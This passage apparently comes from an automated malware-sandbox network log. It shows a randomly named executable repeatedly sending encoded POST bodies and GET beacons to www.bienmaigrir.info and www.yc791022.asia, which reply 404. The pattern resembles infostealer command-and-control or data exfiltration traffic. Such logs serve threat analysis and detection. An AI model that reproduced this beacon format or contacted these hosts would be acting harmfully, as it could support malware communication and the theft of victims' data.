                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          22192.168.2.44997535.220.176.144803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:13:36.365066051 CET653OUTPOST /7yhf/ HTTP/1.1
                                                                                                                          Host: www.bienmaigrir.info
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.bienmaigrir.info
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.bienmaigrir.info/7yhf/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 44 48 51 4a 32 75 6b 72 4d 59 69 44 47 4c 37 54 2b 66 71 58 5a 74 4b 6a 72 34 2f 76 37 47 78 31 6d 49 4b 6d 48 78 71 41 71 48 42 6e 65 51 4f 63 6d 45 73 51 4e 65 44 39 68 6b 70 6d 34 65 70 54 47 6a 4d 6b 62 68 37 66 77 6e 73 4f 4b 77 2f 65 56 43 54 59 69 76 34 59 65 57 39 68 6d 4b 42 38 38 4e 71 55 4e 71 54 4a 79 59 69 67 66 73 76 35 78 6c 32 2b 6a 77 4b 2b 67 58 68 30 4c 68 35 70 73 50 5a 35 53 63 65 30 7a 74 54 41 4c 4a 66 68 4f 70 38 51 6c 51 70 32 38 56 75 2f 53 59 71 48 36 78 5a 6d 4e 59 52 41 34 66 51 39 6e 41 57 36 4f 65 64 44 76 6c 72 34 72 31 67 49 4f 47 65 30 4e 49 42 67 61 54 54 64 4d 59 6d 62 33 53 42 49 39 63 72 72 70 37 6b 3d
                                                                                                                          Data Ascii: Mr60=DHQJ2ukrMYiDGL7T+fqXZtKjr4/v7Gx1mIKmHxqAqHBneQOcmEsQNeD9hkpm4epTGjMkbh7fwnsOKw/eVCTYiv4YeW9hmKB88NqUNqTJyYigfsv5xl2+jwK+gXh0Lh5psPZ5Sce0ztTALJfhOp8QlQp28Vu/SYqH6xZmNYRA4fQ9nAW6OedDvlr4r1gIOGe0NIBgaTTdMYmb3SBI9crrp7k=
                                                                                                                          Nov 22, 2024 15:13:37.935635090 CET691INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:37 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 548
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          23192.168.2.44998135.220.176.144803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:13:39.033026934 CET10735OUTPOST /7yhf/ HTTP/1.1
                                                                                                                          Host: www.bienmaigrir.info
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.bienmaigrir.info
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.bienmaigrir.info/7yhf/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 44 48 51 4a 32 75 6b 72 4d 59 69 44 47 4c 37 54 2b 66 71 58 5a 74 4b 6a 72 34 2f 76 37 47 78 31 6d 49 4b 6d 48 78 71 41 71 48 4a 6e 64 69 32 63 6e 6c 73 51 58 65 44 39 6f 45 70 6e 34 65 6f 50 47 6a 55 67 62 68 2f 6c 77 6c 6b 4f 4b 52 66 65 46 7a 54 59 72 76 34 59 42 47 39 67 37 61 42 4d 38 4e 36 51 4e 71 44 4a 79 59 69 67 66 75 33 35 34 55 32 2b 77 67 4b 35 6e 58 68 43 50 68 35 52 73 4f 39 50 53 63 4b 43 76 4e 7a 41 4c 70 50 68 64 4b 45 51 70 51 70 77 78 31 76 67 53 59 57 59 36 31 35 71 4e 64 46 75 34 64 4d 39 6d 31 7a 7a 61 2f 46 6b 33 45 43 6d 77 6d 4e 72 4e 47 57 75 4a 76 30 66 57 52 71 4a 51 72 71 37 7a 52 34 6a 75 4e 44 4f 37 64 44 54 78 69 36 54 48 69 7a 70 34 74 74 4e 6b 4c 38 62 49 6c 5a 5a 4c 5a 6c 72 38 34 54 52 4d 52 33 69 6c 58 5a 70 36 73 69 38 63 78 70 46 44 47 55 6e 50 61 62 36 41 6a 4c 68 45 68 48 43 43 73 39 6c 43 76 5a 71 50 44 58 79 34 41 74 51 37 37 30 78 2f 4f 45 70 72 64 72 62 2f 6d 71 79 49 55 4c 64 72 59 65 78 69 6a 4a 68 49 61 6d 6e 7a 53 6f 62 62 45 34 72 5a [TRUNCATED]
                                                                                                                          Data Ascii: Mr60=DHQJ2ukrMYiDGL7T+fqXZtKjr4/v7Gx1mIKmHxqAqHJndi2cnlsQXeD9oEpn4eoPGjUgbh/lwlkOKRfeFzTYrv4YBG9g7aBM8N6QNqDJyYigfu354U2+wgK5nXhCPh5RsO9PScKCvNzALpPhdKEQpQpwx1vgSYWY615qNdFu4dM9m1zza/Fk3ECmwmNrNGWuJv0fWRqJQrq7zR4juNDO7dDTxi6THizp4ttNkL8bIlZZLZlr84TRMR3ilXZp6si8cxpFDGUnPab6AjLhEhHCCs9lCvZqPDXy4AtQ770x/OEprdrb/mqyIULdrYexijJhIamnzSobbE4rZcKEinpUuJkqeJ7hAiPixcxLK+J8A3IUsAoPA+5yxMMSRAdwZ9NJqDLgU0A0iUSsSvOlHJlrWDftTOzT8+UyQ3r0t75Rr14Mr/GJztkFOcmjC2IkdCOEstpLDdXr6utLW093XXJNQYcb5SRdjxeZ1jOYH26iqwG8saShnUCBsIRtTZhnA25vnhLi/7Axxvqq2sfPOCgMrIsD/ZSh/HGhdmA+Q7lMFcYeAXIaex6iVrHixZekyGJWmwY8n7grZOmmlrEcyCuF7WQqmkSIF9FWPxz4xvjTzS67oCUF8TvatEQ8t0Xm3c0bJECh8FJdzG5mp47AdxoKcmbtoyDLQdnmVHqnDt72ag12aymZuFt65KdeOo8iErG50CV/Up3NB5FNIA2B3UPEA0WmVZWjrSOq2zfVXyXAcjXxqKBs8DSavoxFD8lS2QL3pT1p9VQV8sAoGLAExNQll78vxyewcyJHV8Ks21IOaiYCz3DgH6lVD8HaeocJlaFn/wnnLkuXj80JSlJxjxFLHli9FC+7SDMqonusjcEgL6MMhTjj7kwy7N4+t7UbclwqfB2rt2xnY+WEOBoLHoHhpKGRf0+SQBlQZQXQ+md8DYDXfm/nKrb3T4SWjiW/6lS0eND95OIqgF/hA8p1wY2pZwBS9F8jZtNdHqdo+Zta8Li2e8l [TRUNCATED]
                                                                                                                          Nov 22, 2024 15:13:40.565495014 CET691INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:40 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 548
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          24192.168.2.44998935.220.176.144803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:13:41.686280012 CET359OUTGET /7yhf/?Mr60=OF4p1YkyIdfCe7eI49mlQK2eqaOY0Xp5m6SnSx71uUBEXBHxoh5TWtGHsn9J2PYNIykLYH3RiXpaFAzmPgGru88xTxROuotR+L2zC6/y25G8bNDJ7z2wjg0=&o6=SpTPojpx7H HTTP/1.1
                                                                                                                          Host: www.bienmaigrir.info
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:13:43.188049078 CET691INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:42 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 548
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          25192.168.2.450007101.35.209.183803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:13:49.356738091 CET624OUTPOST /wu7k/ HTTP/1.1
                                                                                                                          Host: www.yc791022.asia
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.yc791022.asia
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.yc791022.asia/wu7k/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 72 75 73 63 56 71 31 69 4c 4b 34 4b 4a 57 5a 73 31 34 6d 6f 77 37 59 30 6f 41 6b 43 4c 71 57 55 38 67 31 72 70 58 74 2b 75 48 77 79 56 49 63 68 46 69 31 56 6b 62 54 76 30 72 6b 7a 66 6a 6a 77 4f 42 56 42 52 67 5a 69 2f 2f 70 58 53 4f 34 2b 65 4c 73 78 78 5a 44 31 67 6c 57 4d 78 58 46 39 6b 61 31 47 42 6c 55 61 59 34 71 35 41 54 68 43 72 41 65 68 77 61 61 50 75 75 42 2f 4d 67 70 67 36 4c 63 59 45 38 56 73 52 75 51 49 36 70 4c 4c 49 56 52 39 75 4c 53 59 4a 36 41 36 30 42 6f 65 4a 75 34 2f 76 4e 54 6e 56 68 35 69 50 6e 57 39 55 37 62 33 64 49 47 63 46 57 65 41 53 76 48 37 41 41 3d 3d
                                                                                                                          Data Ascii: Mr60=ruscVq1iLK4KJWZs14mow7Y0oAkCLqWU8g1rpXt+uHwyVIchFi1VkbTv0rkzfjjwOBVBRgZi//pXSO4+eLsxxZD1glWMxXF9ka1GBlUaY4q5AThCrAehwaaPuuB/Mgpg6LcYE8VsRuQI6pLLIVR9uLSYJ6A60BoeJu4/vNTnVh5iPnW9U7b3dIGcFWeASvH7AA==
                                                                                                                          Nov 22, 2024 15:13:50.825798035 CET427INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:50 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 263
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          26192.168.2.450013101.35.209.183803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:13:52.126336098 CET644OUTPOST /wu7k/ HTTP/1.1
                                                                                                                          Host: www.yc791022.asia
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.yc791022.asia
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.yc791022.asia/wu7k/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 72 75 73 63 56 71 31 69 4c 4b 34 4b 54 32 70 73 30 66 79 6f 33 62 59 33 32 51 6b 43 45 4b 57 51 38 67 35 72 70 57 5a 75 75 53 67 79 56 6f 4d 68 44 58 42 56 70 37 54 76 38 4c 6b 72 52 44 6a 33 4f 42 59 38 52 68 6c 69 2f 2f 39 58 53 4b 30 2b 66 34 30 77 78 4a 44 7a 2b 46 57 4f 2f 33 46 39 6b 61 31 47 42 68 31 50 59 35 43 35 41 43 52 43 6b 45 71 69 35 36 61 4d 70 75 42 2f 49 67 70 38 36 4c 63 36 45 35 6f 78 52 73 59 49 36 6f 37 4c 4c 48 70 36 39 72 54 54 57 71 42 7a 6c 6a 74 41 42 75 52 4f 74 4c 50 34 54 69 64 68 4b 68 62 6e 46 4b 36 67 50 49 69 76 59 52 58 30 66 73 36 79 62 41 6a 62 48 68 78 2b 59 6b 64 2b 48 4c 52 36 62 59 67 6d 42 4d 41 3d
                                                                                                                          Data Ascii: Mr60=ruscVq1iLK4KT2ps0fyo3bY32QkCEKWQ8g5rpWZuuSgyVoMhDXBVp7Tv8LkrRDj3OBY8Rhli//9XSK0+f40wxJDz+FWO/3F9ka1GBh1PY5C5ACRCkEqi56aMpuB/Igp86Lc6E5oxRsYI6o7LLHp69rTTWqBzljtABuROtLP4TidhKhbnFK6gPIivYRX0fs6ybAjbHhx+Ykd+HLR6bYgmBMA=
                                                                                                                          Nov 22, 2024 15:13:53.593094110 CET427INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:13:53 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 263
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          27192.168.2.450019101.35.209.183803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:13:54.894814014 CET10726OUTPOST /wu7k/ HTTP/1.1
                                                                                                                          Host: www.yc791022.asia
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.yc791022.asia
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.yc791022.asia/wu7k/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 72 75 73 63 56 71 31 69 4c 4b 34 4b 54 32 70 73 30 66 79 6f 33 62 59 33 32 51 6b 43 45 4b 57 51 38 67 35 72 70 57 5a 75 75 53 6f 79 56 37 30 68 41 77 64 56 6f 37 54 76 79 72 6b 6f 52 44 6a 6d 4f 42 41 77 52 68 70 63 2f 38 46 58 55 70 38 2b 4b 35 30 77 36 4a 44 7a 32 6c 57 4c 78 58 45 6e 6b 65 52 4b 42 6c 5a 50 59 35 43 35 41 42 4a 43 6a 51 65 69 31 61 61 50 75 75 41 72 4d 67 70 59 36 4c 55 51 45 34 34 68 51 63 34 49 37 49 72 4c 48 53 46 36 2b 4c 54 52 56 71 42 72 6c 69 52 68 42 75 4d 78 74 4c 54 65 54 68 42 68 4c 67 69 64 52 72 2b 32 55 34 72 77 59 51 7a 67 59 38 57 31 53 42 33 2f 4e 53 6c 72 4d 48 42 49 4a 34 41 33 41 70 77 46 56 59 6e 6e 68 51 44 79 78 41 56 57 6a 71 44 45 43 52 32 34 79 59 48 41 52 44 6f 39 6b 61 47 69 53 57 2f 4f 6f 71 77 4c 52 4c 56 77 63 49 79 7a 4c 47 37 4c 41 4e 6b 4b 53 53 70 70 76 52 6e 6d 62 58 53 50 72 78 6d 35 6c 63 7a 6e 65 43 48 76 34 43 2f 6f 61 6d 75 73 32 32 76 4c 41 5a 74 38 33 4b 4c 74 4a 41 55 34 31 69 76 55 36 62 42 49 41 79 68 4f 4b 30 53 51 30 [TRUNCATED]
                                                                                                                          Data Ascii: Mr60=ruscVq1iLK4KT2ps0fyo3bY32QkCEKWQ8g5rpWZuuSoyV70hAwdVo7TvyrkoRDjmOBAwRhpc/8FXUp8+K50w6JDz2lWLxXEnkeRKBlZPY5C5ABJCjQei1aaPuuArMgpY6LUQE44hQc4I7IrLHSF6+LTRVqBrliRhBuMxtLTeThBhLgidRr+2U4rwYQzgY8W1SB3/NSlrMHBIJ4A3ApwFVYnnhQDyxAVWjqDECR24yYHARDo9kaGiSW/OoqwLRLVwcIyzLG7LANkKSSppvRnmbXSPrxm5lczneCHv4C/oamus22vLAZt83KLtJAU41ivU6bBIAyhOK0SQ06967uwPzfQFMhBFOPthx1z932VCO9w8oG3TBUgBW9BDcxfiPUJZuR9JWfP6yTeEgJz55+vn+M/tZLJyXDIaETlVl73Wq2qJ0UI8qe0Xd9Y+6whyyHFivrHH7+Y8U81DqJ0mkYy4V2s1zcoKzQIGWwf52lzwncPDVaO8FfwDITRt6B+8ty8JBa/CmDDWhZwyl3O0lPns6YRTuCJwNqYmzjXFlPuCoRzTDPIjeYhNOYACYolws58f7WZgOfO6kCjfxewRMq0fs5cN0mpYY5pkiwAYnd/zTWYBs3K0N9sJJn62JGxn91tAFlBk5m2AqK/cSgfI6tHuCmZSEf7sXiaFr6yzPXE5AqWJv21iRglRXCNzhcKsYjkSyi1alTw7gdtltWIT4ShgtIDcYlANMSXq+bk65DeO7LnXhn1UlQJrcj2SU9QltmasHeVcWxm2dMlW/JeDbEbw73M17nmT6dH6Rrl7tgr6R5errS/jZiyK+R6Vy1nTu6023RBSGMJXXxQjPnrj9f5d+gabpDiDGtS+fn2vO6ueWEzI7rUCnAv/Q8H1c1qNkdM09KmlLAx63KReUksXgPBn+ndeDVFtVjQBc3PAh5Wvn0Rxa6CTCdy10QpPKJNHE7Vjst95/Ee7+EghI581RIoP54TxgIU5vvUY8kGeAqKsDHGr10R [TRUNCATED]


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          28192.168.2.450026101.35.209.183803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:13:57.544239998 CET356OUTGET /wu7k/?Mr60=msE8We8dGqsfRntVyauP2sAWp39/EoG83S1Gvm9i1konD6ZBc3B28v2M3s5YR0KKFS9CfgF+yd8Vab4bVKVP4o7T3EWu90E9kOVVHAZEZpi4QiZXp0u9yLs=&o6=SpTPojpx7H HTTP/1.1
                                                                                                                          Host: www.yc791022.asia
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:14:02.130707026 CET427INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:14:01 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 263
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
